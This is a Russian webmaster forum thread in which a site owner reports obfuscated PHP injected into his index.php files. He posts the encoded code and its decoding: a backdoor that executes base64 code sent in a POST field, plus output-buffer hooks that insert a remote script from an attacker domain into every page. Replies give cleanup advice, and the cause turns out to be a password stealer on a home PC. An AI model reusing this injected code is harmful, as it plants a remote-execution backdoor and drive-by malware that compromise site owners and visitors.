Vse o BUX

Объявление

Если вам помогли на форуме, помогите и вы нам.

Разместите здесь свой баннер всего за 1 wmr в сутки.

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Vse o BUX » Вирус на сайте » Вирус в Index.php

Вирус в Index.php

Страница: 1 2 3 4  

Сообщений 1 страница 10 из 31

1

  • Автор: ipsuss
  • Постоялец

Здравствуйте. Появился закодированый код на всех моих сайтах в скрипте index.php (вот весь он:)

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygncmR1aHMnKSl7ZnVuY3Rpb24gcmR1aHMoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM05sZG1sdVkybHNaWFJwYzJsdExtTnZiUzl0YjJSMWJHVnpMM0p2WW05MGN5NXdhSEFnUGp3dmMyTnlhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gcmR1aHMyKCRhLCRiLCRjLCRkKXtnbG9iYWwkcmR1aHMxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRyZHVoczEpKWNhbGxfdXNlcl9mdW5jKCRyZHVoczEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3JkdWhzJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgncmR1aHMnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kcmR1aHNsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdyZHVoczInKSkhPSdyZHVoczInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>

Кто знает как это произойти могло и как попасть на скрипт минуя ФТП и т.п. вещи? И кто может раскодируйте

0

2

  • Автор: ipsuss
  • Постоялец

Извиняюсь за кривой пост, но вот раскодировка:

Код:
if(!function_exists('rduhs')){function rduhs($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3NldmluY2lsZXRpc2ltLmNvbS9tb2R1bGVzL3JvYm90cy5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function rduhs2($a,$b,$c,$d){global$rduhs1;$s=array();if(function_exists($rduhs1))call_user_func($rduhs1,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='rduhs')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('rduhs');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$rduhsl=(($a=@set_error_handler('rduhs2'))!='rduhs2')?$a:0;eval(base64_decode($_POST['e']));

Отредактировано ipsuss (2010-04-10 10:18:50)

0

3

  • Автор: ipsuss
  • Постоялец

Потом вторая расшифровка выводится скриптом на сайт <script src=http://sevinciletisim.com/modules/robots.php ></script>

P.S. Доступ к ФТП никто получить не мог, пароли слишком сложные (генератором) и никто 100% их не видел

0

4

  • Автор: qazantip
  • Администратор
  • qazantip

Это код эксплойта, не совсем и вирус конечно) Скорее всего пересылал данные (может пароль админа)
Совет:
1. Срочно написать суппорту хостинга! (если вирус распространится тебя за это по головке не погладят)
2. Проверить на вирусы вот таким сервисом Проверить сайт на вирусы - каждую страничку!
3. Удалить все лишние коды, не соответствующие скрипту.
4. Внимательно присмотреться к партнеркам установленным на сайте (особенно а-далт партнерки)
5. Срочно сменить все пароли на сайте и в FTP клиенте!
6. Никогда не сохранять данные доступа к сайту в  FTP клиенте!
7. Пользоваться только лицензионным FTP клиентом!

0

5

  • Автор: ipsuss
  • Постоялец

Все это сделал, все сменил убрал все эксплоиты (я их расшифровал) как подать и закрыть нахрен сайт sevinciletisim.com/modules/robots.php ? Что самое интересное, я все сменил, абсолютно все пароли и названия, убрал так же весь лишний закодированный код - через 10 минут код появляется в наглую уже без шифровки...Кто то налету тырит все пароли FTP, использую Dr.Web 6.0 базы последние, так же есть AVZ последний, короче никто и ничего не находит. Подскажите где скачать фаервол последний и желательно крякнутый. По WHOIS нашел хозяина того сайта, есть даже телефон (он явно не русский и не американец) и его имя тоже есть

0

6

  • Автор: qazantip
  • Администратор
  • qazantip
ipsuss написал(а):

использую Dr.Web 6.0 базы последние, так же есть AVZ последний,

Это полный отстой)
Тем более если хочешь проверить сайт, обычный антивир не подойдет!
Используй сервис по ссылке что я дал.
И сообщи суппорту хостинга, они должны защитить сайт.
А тырят у тебя наверное (если конечно хост нормальный) прямо с компа.
Ставь Avast и Ad Aware в связке работают отлично! Не парят друг-друга и не мешают!
И блокируй в файле .htaccess IP злоумышленника.
Еще лучше прикрой сайт на пару часов, и связывайся с хостингом - это их работа!
Если твой сайт сломали через сервер, то чуть позже задосят сервер и полетит к черту весь хост.
А на тебе так тренируются)

0

7

  • Автор: ipsuss
  • Постоялец

Хост дорогой и я с ними связался давно, говорят проверить мой ПК. снес систему, поставил антивиров кучу фаервол + dr.web + asp, + avz + anvir. Теперь вирра нету, можно менять сново пароли. А как заблочить ну или подать претензию нра тот сайт? я нашел хостинг того сайта и даже имя злоумышленника, но дальше то что...

0

8

  • Автор: ipsuss
  • Постоялец

А по поводу сайта что дал - вируса он не видит. Написал в суппорт, сказали снести систему и поставить хороший антивир и проверить комп, только потом менять пароли. так и сделал

0

9

  • Автор: qazantip
  • Администратор
  • qazantip

Тот сайт проверяет вирусы именно на сайте. Эксплойт не есть вирус) это вредоносный код.
Значит проблема у тебя была в вирусе на компе)
Те что ты поставил хреново защищают, но дело твое)
Что делать с тем челом?
А что можно с ним сделать? Найдешь вмид подай претензию)

0

10

  • Автор: ipsuss
  • Постоялец

Спасибо, проблема решена, конечно же был пинч на ПК (я по дурости начал выходить на FTP не через свой ПК а через ПК сестры :) Конечно же там был пинч.. А теперь по поводу блокировки сайтов злоумышленников. Кто какие мысли может предложить по этому поводу, чтобы в будущем, совместно при жалобе на форуме мы помогали друг другу в этом, и по возможности блокировали или посылали всевозможные претензии куда только можно.

0

Страница: 1 2 3 4  

Вы здесь » Vse o BUX » Вирус на сайте » Вирус в Index.php